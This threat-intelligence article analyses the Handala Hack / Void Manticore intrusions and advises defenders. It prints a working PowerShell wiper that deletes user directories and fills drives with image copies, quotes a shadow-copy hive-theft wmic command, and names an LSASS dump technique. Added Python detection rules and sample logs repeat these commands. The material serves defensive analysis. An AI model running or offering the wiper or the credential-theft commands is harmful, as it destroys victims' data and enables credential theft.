Manual Malice: How Handala Hack Weaponizes AI Wipers and NetBird for Rapid Network Annihilation
The Iranian syndicate designated “Handala Hack”—a collective inextricably intertwined with the Void Manticore cluster and the Iranian Ministry of Intelligence and Security (MOIS)—persists in operating via a profoundly brutal, albeit structurally unpretentious, choreography: secure ingress, rapidly entrench within the network perimeter, manually traverse the infrastructure, and simultaneously detonate a multiplicity of data annihilation vectors. In a recent forensic dissection, investigators have illuminated not merely the syndicate’s orthodox repertoire, but several novel idiosyncrasies. Prominent among these are the weaponization of NetBird to forge clandestine tunnels within compromised enclaves, alongside a PowerShell-driven wiper bearing the unmistakable hallmarks of artificial intelligence orchestration within its source code.
The moniker “Handala Hack” does not denote a solitary, ephemeral campaign, but rather serves as one of the public visages of Void Manticore. This overarching architecture possesses auxiliary, well-documented personas—notably “Karma” and “Homeland Justice.” It was precisely Homeland Justice that was used for protracted kinetic operations against Albania, relentlessly targeting state apparatuses and the telecommunications sector. Handala, conversely, was historically synonymous with offensives directed against Israeli entities; however, its geographical theater is no longer confined to the Levant. Forensic analysts explicitly document incursions against American conglomerates, conspicuously including the medical technology leviathan Stryker.
According to the dossier, the group’s Tactics, Techniques, and Procedures (TTPs) have remained remarkably static from 2024 through 2026. Void Manticore resolutely champions manual navigation within the besieged network, leveraging commercial and ubiquitous utilities, pre-fabricated wipers, publicly accessible tools for data obliteration and cryptographic locking, alongside subterranean services to secure initial ingress and procure malicious instrumentation. The cardinal nuance here lies elsewhere: even devoid of profoundly exotic stratagems, the syndicate achieves catastrophic destructive efficacy. This triumph is born of blistering operational celerity, the ruthless exploitation of privileged credentials, and a simultaneous, multi-vector assault.
Investigators postulate a profound intertwining among the personas of Handala, Karma, and Homeland Justice. Incidents attributed to these disparate fronts exhibited homologous tactical maneuvers and shared contiguous segments of source code within their respective wipers. Furthermore, Karma and Homeland Justice demonstrated a cooperative synergy with an auxiliary Iranian cluster, “Scarred Manticore.” In specific scenarios, the operational tableau was exquisitely revealing: internal missives and digital graffiti etched by the malefactors pointed unequivocally to Karma, yet the exfiltrated telemetry was ultimately disseminated under the Handala banner. The authors hypothesize that Karma and Handala may have originally functioned as dual, autonomous squadrons or bifurcated branches within a singular architecture, subsequently amalgamating beneath the more conspicuous brand of Handala. This theory is tangentially corroborated by Karma’s evaporation from the public theater and Handala’s absolute dominion over recent operations.
Open-source intelligence reveals profound intersections between Void Manticore’s kinetic activity and operations historically attributed to the MOIS’s internal security directorate—specifically, the anti-terrorism vanguard orchestrated by Seyed Yahya Hosseini Panjaki. Forensic savants note that Panjaki, according to open-source dispatches, perished during the nascent stages of Israeli kinetic strikes against Iran in early March 2026. While this revelation does not directly alter the technical anatomy of their attacks, it profoundly contextualizes the cluster within the broader Iranian geopolitical theater.
Handala’s initial ingress, according to the authors’ observations, is frequently architected around third-party contractors, IT syndicates, and service providers. The strategic logic is elegantly simple: a singular intermediary serves as a conduit to simultaneously breach a multitude of sovereign networks. The syndicate has long demonstrated a voracious appetite for credentials, particularly weaponizing compromised VPN authentications. In recent months, investigators have detected hundreds of authentication endeavors and password brute-forcing campaigns directed against enterprise VPN infrastructures, activities definitively tethered to Handala’s operational architecture. Such connections frequently originated from commercial VPN nodes, whilst the source telemetry routinely betrayed default Windows hostnames akin to DESKTOP-XXXXXX or WIN-XXXXXX.
Following the severing of the Iranian internet in January, the operational tableau subtly mutated. Investigators detected homologous kinetic activity emanating from IP coordinates attributed to Starlink, noting that this pattern has stubbornly persisted. Concurrently, the syndicate suffered a precipitous degradation in operational discipline. Whereas operators previously labored to shroud their traffic behind commercial VPNs, striving to obscure their true provenance, subsequent episodes betrayed direct connections originating from sovereign Iranian IP coordinates. Historically, when orchestrating strikes against Israeli targets, the group customarily egressed via the 169.150.227.X subnet. Occasionally, this cryptographic masquerade fractured, exposing connections from either Iranian domains or Virtual Private Servers (VPS). The investigators surmise that following the eruption of martial hostilities, sustaining their antecedent standard of obfuscation became profoundly arduous. In isolated instances, malefactors successfully egressed via the Israeli node 146.185.219[.]235, which the authors assess was similarly tethered to a VPN service, albeit deviating from their historical infrastructure.
A distinctly documented scenario details an instance wherein network ingress—presumably weaponized during the subsequent annihilation phase—was secured months prior to the kinetic strike. Investigators posit that this protracted, early access bestowed upon the malefactors the luxury to deeply entrench, harvest requisite credentials, and crucially, ascend to the zenith of “Domain Admin” privileges within the Active Directory architecture. In the agonizing hours preceding Handala’s destructive crescendo, analysts assess that the syndicate systematically verified the viability of their access and rigorously tested authentication utilizing the purloined credentials.
A fraction of this pre-strike choreography deviated subtly from the syndicate’s orthodox signature; consequently, the authors cautiously stipulate that not every maneuver can be unequivocally attributed to Handala with absolute certainty. Nevertheless, this sequence harbored activities quintessential to attack preparation: the draconian disabling of Windows Defender armaments, rigorous internal reconnaissance, credential exfiltration, and endeavors to retrieve auxiliary payloads from an isolated command-and-control server residing at 107.189.19[.]52.
Subsequently, the malefactors escalated to credential exfiltration via a multiplicity of vectors. The dossier chronicles the dumping of the LSASS process via comsvcs.dll utilizing rundll32.exe. LSASS operates as a foundational Windows systemic process, its memory architecture harboring credentials and intelligence vital for protracted lateral movement. Concurrently, the assailants exfiltrated profoundly sensitive registry hives, notably encompassing HKLM. Furthermore, ADRecon was ignited within the infrastructure under the guise of dra.ps1. This constitutes a formidable PowerShell framework engineered for reconnaissance within Active Directory enclaves: it empowers the harvesting of intelligence concerning users, groups, trust architectures, computational hosts, and administrative hierarchies. It is precisely at this juncture, the investigators deduce, that the malefactors likely usurped the Domain Admin privileges subsequently weaponized in Handala’s wiping operations.
The dossier also illuminates a captured command fragment, leveraged to clone telemetry from the volume shadow copy:
wmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system c:\users\public"
Upon securing supreme access and privileges, the syndicate transitioned to lateral movement across the network. Here, Handala, according to the investigators, persists in operating predominantly via manual orchestration. Their primary conduit for traversing disparate systems is the Remote Desktop Protocol (RDP). Via this ubiquitous protocol, operators seamlessly authenticate into compromised hosts, navigating the environment with the impunity of an orthodox administrator. However, should critical machines prove inaccessible directly from the exterior, a profoundly more intriguing instrument was deployed: NetBird.
NetBird operates as a legitimate architectural platform for forging secure, private mesh networks predicated upon a zero-trust paradigm. Simply articulated, it facilitates the tethering of disparate machines such that their communion traverses a cryptographically secured tunnel, rendering them utterly independent of orthodox, direct network visibility. For an adversary, this presents an exquisite utility: if a singular host has capitulated, this instrument can be weaponized to weave a sovereign, private network deep within the perimeter, granting unimpeded access to auxiliary nodes. In the chronicled incident, NetBird was installed manually. Operators authenticated into compromised systems via RDP, launched the native browser, and downloaded the client directly from the official NetBird repository. Following its installation across multiple internal hosts, they secured a formidable layer of internal connectivity, empowering them to operate with terrifying celerity. In one specific incident, investigators observed a minimum of five distinct machines, entirely subjugated by the assailants, operating synchronously within the environment.
The destructive crescendo manifested with terrifying brutality. To inflict absolute, maximal devastation, the syndicate simultaneously deployed four disparate wiping techniques in parallel. This redundancy was not orchestrated for mere aesthetic elegance. Should one methodology falter or face partial interdiction, the auxiliary vectors would relentlessly sustain the data annihilation. To proliferate these diverse wipers across the network, the malefactors weaponized Group Policy within Active Directory. This constitutes an immensely potent instrument within the corporate Windows theater: it grants the capacity to centrally and instantaneously distribute scripts and directives across a vast multitude of machines.
The inaugural component was christened the “Handala Wiper” by investigators. In certain instances, the executable masqueraded as handala.exe. This wiper was propagated via a scheduled task, birthed through logon scripts embedded within Group Policy. The handala.bat script ignited dual components: the executable and a PowerShell script. The investigators explicitly underscore a fascinating architectural nuance: the executable itself was launched remotely directly from the domain controller, scrupulously avoiding any physical inscription upon the disks of the besieged machines. This sophisticated artifice profoundly confounds post-incident detection and forensic dissection. Within the system, the venomous code overwrote file contents and weaponized wiping techniques targeting the Master Boot Record (MBR). The corruption of the MBR not merely renders the system utterly inoperable, but monumentally complicates any endeavor at restoration.
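The credential-access commands described earlier (the comsvcs.dll LSASS dump, the remote wmic shadow-copy hive copy, ADRecon as dra.ps1, registry hive exports) and the launch of the wiper straight from the domain controller's share are all visible in process-creation telemetry. The following detection logic, an added Python example that is not from the investigators' report, runs those checks over constructed sample events; the hostnames, users, PIDs and paths in the samples are invented placeholders.

```python
import re

# Constructed process-creation events (Sysmon EventID 1 / Security 4688
# style), flattened to "image|parent image|command line". Hostnames, users,
# PIDs and paths are invented placeholders, not values from the report;
# the password in the wmic line is masked as it would be in a sanitized log.
SAMPLE_EVENTS = [
    "rundll32.exe|cmd.exe|rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\Users\\Public\\lsass.dmp full",
    "wmic.exe|powershell.exe|wmic.exe /node:FILESRV01 /user:corp\\svc_backup /password:*** process call create "
    "\"cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system c:\\users\\public\"",
    "powershell.exe|explorer.exe|powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\Public\\dra.ps1",
    "reg.exe|cmd.exe|reg.exe save HKLM\\SAM C:\\Users\\Public\\sam.hiv",
    "cmd.exe|userinit.exe|cmd.exe /c \\\\DC01\\SYSVOL\\corp.example\\scripts\\handala.bat",
    "notepad.exe|explorer.exe|notepad.exe C:\\Users\\alice\\notes.txt",
]

# Each rule: (name, severity, compiled pattern applied to the command line).
RULES = [
    ("lsass_dump_comsvcs", "high", re.compile(r"rundll32.*comsvcs\.dll.*minidump", re.I)),
    ("wmic_remote_exec", "medium", re.compile(r"wmic.*/node:.*process\s+call\s+create", re.I)),
    ("shadowcopy_hive_access", "high", re.compile(r"harddiskvolumeshadowcopy\d+.*\\config\\(system|sam|security)", re.I)),
    ("adrecon_script", "medium", re.compile(r"\bdra\.ps1\b", re.I)),
    ("registry_hive_export", "high", re.compile(r"reg(\.exe)?\s+save\s+hklm\\(sam|system|security)", re.I)),
    # Script or binary launched from a DC's SYSVOL/NETLOGON share (never written locally).
    ("exec_from_dc_share", "high", re.compile(r"\\\\[^\\]+\\(sysvol|netlogon)\\.*\.(exe|bat|ps1)\b", re.I)),
]


def scan(events):
    """Return one (rule, severity, image, parent) tuple per rule match, in event order."""
    findings = []
    for line in events:
        image, parent, cmdline = line.split("|", 2)
        for name, severity, pattern in RULES:
            if pattern.search(cmdline):
                findings.append((name, severity, image, parent))
    return findings


def triage(events):
    """Collapse findings into a severity-ordered list of distinct rule names."""
    order = {"high": 0, "medium": 1}
    names = {f[0]: f[1] for f in scan(events)}
    return sorted(names, key=lambda n: (order[names[n]], n))


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
    print("triage order:", triage(SAMPLE_EVENTS))
```

Note that the single wmic event trips two rules (remote execution and shadow-copy hive access), which is the kind of overlap worth keeping rather than deduplicating away.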
During the terminal phase, the operators unleashed a final, bespoke component: a PowerShell wiper. It, too, was disseminated via Group Policy logon scripts, thereby empowering it to rapidly engulf a multitude of machines. Its operational logic is brutally simple, yet catastrophic: the script recursively enumerates all files nested within user directories and ruthlessly eradicates them. The investigators assess that, judging by its architectural structure and exhaustive annotations, this PowerShell script was highly likely authored with the assistance of artificial intelligence. In its final act of defiance, the script littered the logical drives with the image handala.gif, leaving an indelible, visual monument to the attack.
The following represents the complete fragment of the PowerShell code incorporated within the investigators’ dossier:
$usersFolder = 'C:\Users'
# Ensure the folder exists
if (Test-Path $usersFolder) {
    # Get all items in C:\Users, but not the Users folder itself
    $items = Get-ChildItem -Path $usersFolder -Recurse
    # Remove each item (files and subfolders) inside C:\Users
    foreach ($item in $items) {
        try {
            Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop
        } catch {
            Write-Host "Could not delete: $($item.FullName)"
        }
    }
}
$sourceFile = '\\[REDACTED]\SYSVOL\[REDACTED]\scripts\Administtration\install\handala.rar'
$destinationFolder = 'C:\users'
if (!(Test-Path $destinationFolder)) {
    New-Item -ItemType Directory -Path $destinationFolder | Out-Null
}
$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\')
$i = 0
while ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {
    Copy-Item $sourceFile "$destinationFolder\Handala_$i.gif"
    $i++
}
Beyond their bespoke wipers, the syndicate also weaponized entirely legitimate software—specifically, VeraCrypt. Customarily, VeraCrypt is venerated as an instrument for the cryptographic encryption of disks and containers, utilized to fortify data privacy. In the Handala offensive, it was transmuted into an auxiliary layer of annihilation. An operator would authenticate to a host via RDP, download VeraCrypt from its official repository using the native browser, and subsequently execute the encryption of the systemic drives. For the victim, this represents a profoundly agonizing reality: even if a fraction of the wipers functioned imperfectly or were intercepted, the cryptographically sealed drives remain utterly inaccessible, monumentally complicating any restorative endeavor.
In certain scenarios, the syndicate entirely eschewed complexity, resorting to the manual deletion of telemetry. Investigators chronicled episodes wherein operators authenticated to machines via RDP, manually selected files, and simply commanded their deletion. In a homologous fashion, they eradicated virtual machines directly from the virtualization hypervisor. This tactic appears almost primitively simplistic, yet under the auspices of usurped privileges and absolute dominion over the environment, it proves devastatingly effective. Furthermore, investigators observed this homologous behavior not merely within the incidents themselves, but also vividly displayed within video recordings and exfiltrated materials publicly disseminated by Handala.
The overarching conclusion of the dossier is starkly direct. Handala, alongside its tethered Void Manticore cluster, does not predicate its success upon esoteric, hyper-advanced technological sleight of hand. Their operational paradigm is anchored in rudimentary, yet devastatingly kinetic, maneuvers: purloined credentials, blistering network ingress, manual infrastructural traversal, cryptographic tunneling via legitimate utilities, the weaponization of Group Policy for mass proliferation, and a synchronous multiplicity of data annihilation vectors. It is precisely for this reason that defending against such operations remains profoundly orthodox: the more hermetically sealed the foundational access vectors are, and the more rapidly manual anomaly detection triggers within the network, the narrower the assailants’ temporal window to reach their destructive crescendo.
In their strategic counsel to defenders, the investigators preeminently advise the draconian enforcement of Multi-Factor Authentication (MFA), particularly concerning remote ingress and privileged accounts. Profound vigilance must be directed toward anomalous authentication telemetry: logins originating from sovereign territories where the organization historically possesses no footprint, inaugural logins during profoundly unusual temporal windows, cascading sequences of failed attempts culminating in a triumphant login, the registration of nascent hardware, anomalous volumes of data exfiltration during a VPN session, and authentication routed through nascent Autonomous System Numbers (ASNs) or hosting purveyors.
Furthermore, the authors vehemently recommend the interdiction of access originating from high-risk geographic territories and infrastructures. The dossier explicitly advocates for the absolute blockade of inbound connections emanating from Iran at the perimeter and across all remote access services, barring an unequivocally validated business imperative. A homologous edict applies to Starlink IP ranges, which, according to the investigators’ observations, have already been weaponized by Iranian operatives. Should an absolute blockade prove unfeasible, they propose, at a minimum, the implementation of conditional access protocols, the draconian fortification of authentication prerequisites, and the dedicated, granular monitoring of such network ranges.
An auxiliary, critical block of counsel concerns RDP. They advocate for its maximal restriction, rigorous fortification, and absolute termination wherever it lacks a tangible, operational necessity. It is profoundly beneficial to actively hunt for RDP connections originating from hosts bearing default Windows nomenclatures akin to DESKTOP-XXXXXX or WIN-XXXXXXXX, most acutely if such sessions ignite outside orthodox operational hours. Ultimately, vigilant surveillance must be maintained over the deployment of Potentially Unwanted Programs (PUPs): remote administration and monitoring architectures, VPN clients akin to NetBird, and cryptographic tunneling utilities, conspicuously including SSH for Windows.
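Two of the hunting signals above lend themselves to simple logic over logon telemetry: the cascade of failed attempts ending in a success from the MFA guidance, and RDP sessions from hosts with default Windows names, most acutely outside working hours. The following is an added Python example, not code from the investigators' report; the sample events, the business-hours window, the failure threshold and the assumed suffix length of default hostnames are all constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Default Windows hostname shapes called out in the report (DESKTOP-XXXXXX,
# WIN-XXXXXXXX); the exact suffix length accepted here is an assumption.
DEFAULT_HOSTNAME = re.compile(r"^(DESKTOP|WIN)-[A-Z0-9]{6,8}$", re.I)
BUSINESS_HOURS = range(8, 18)        # assumed 08:00-17:59 local time
FAIL_THRESHOLD = 5                   # assumed: failures before a success counts
FAIL_WINDOW = timedelta(minutes=10)  # assumed look-back for those failures
RDP_LOGON_TYPE = "10"                # Windows logon type 10 = RemoteInteractive (RDP)

# Constructed logon events: (timestamp, user, source workstation, logon type,
# outcome). Users and hostnames are invented placeholders.
SAMPLE_LOGONS = [
    ("2026-03-02T02:11:05", "svc_backup", "DESKTOP-A1B2C3D", "10", "failure"),
    ("2026-03-02T02:11:20", "svc_backup", "DESKTOP-A1B2C3D", "10", "failure"),
    ("2026-03-02T02:11:41", "svc_backup", "DESKTOP-A1B2C3D", "10", "failure"),
    ("2026-03-02T02:12:02", "svc_backup", "DESKTOP-A1B2C3D", "10", "failure"),
    ("2026-03-02T02:12:30", "svc_backup", "DESKTOP-A1B2C3D", "10", "failure"),
    ("2026-03-02T02:13:10", "svc_backup", "DESKTOP-A1B2C3D", "10", "success"),
    ("2026-03-02T09:15:00", "alice", "WS-ALICE-01", "10", "success"),
    ("2026-03-02T11:40:12", "carol", "WS-CAROL-02", "10", "failure"),
    ("2026-03-02T11:40:30", "carol", "WS-CAROL-02", "10", "failure"),
    ("2026-03-02T11:40:55", "carol", "WS-CAROL-02", "10", "success"),
    ("2026-03-02T14:00:00", "bob", "WIN-9XK2Q7P", "10", "success"),
]


def parse(event):
    ts, user, host, ltype, outcome = event
    return datetime.fromisoformat(ts), user, host, ltype, outcome


def default_host_rdp(events):
    """Successful RDP logons from default-named hosts; last field marks off-hours sessions."""
    hits = []
    for ts, user, host, ltype, outcome in map(parse, events):
        if outcome == "success" and ltype == RDP_LOGON_TYPE and DEFAULT_HOSTNAME.match(host):
            hits.append((user, host, ts.isoformat(), ts.hour not in BUSINESS_HOURS))
    return hits


def brute_force_then_success(events):
    """A success preceded by >= FAIL_THRESHOLD failures for the same user inside FAIL_WINDOW."""
    hits = []
    failures = {}  # user -> failure timestamps still inside the window
    for ts, user, host, ltype, outcome in sorted(map(parse, events)):
        window = [t for t in failures.get(user, []) if ts - t <= FAIL_WINDOW]
        if outcome == "failure":
            window.append(ts)
        elif len(window) >= FAIL_THRESHOLD:
            hits.append((user, host, len(window), ts.isoformat()))
            window = []  # reset so one cascade is reported once
        failures[user] = window
    return hits


if __name__ == "__main__":
    print("default-host RDP:", default_host_rdp(SAMPLE_LOGONS))
    print("brute force then success:", brute_force_then_success(SAMPLE_LOGONS))
```

In the sample, the service account logging in at 02:13 after five failures from a DESKTOP-named host trips both checks, while the daytime logon from the WIN-named host is reported but not marked off-hours.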
The Handala narrative vividly illustrates a profoundly unsettling, yet vital, truth: orchestrating a colossal, catastrophic incident does not universally demand a labyrinthine, next-generation implant. Frequently, all that is required is purloined VPN access, Domain Admin privileges, Remote Desktop Protocol, a handful of legitimate utilities, and a cadre of operators prepared to rapidly and manually carve their way through the network. It is precisely this reality that renders such campaigns an existential peril, not merely for high-profile geopolitical targets, but for pedestrian enterprises whose foundational hygiene regarding remote access and internal administration remains perilously anchored to antiquated assumptions.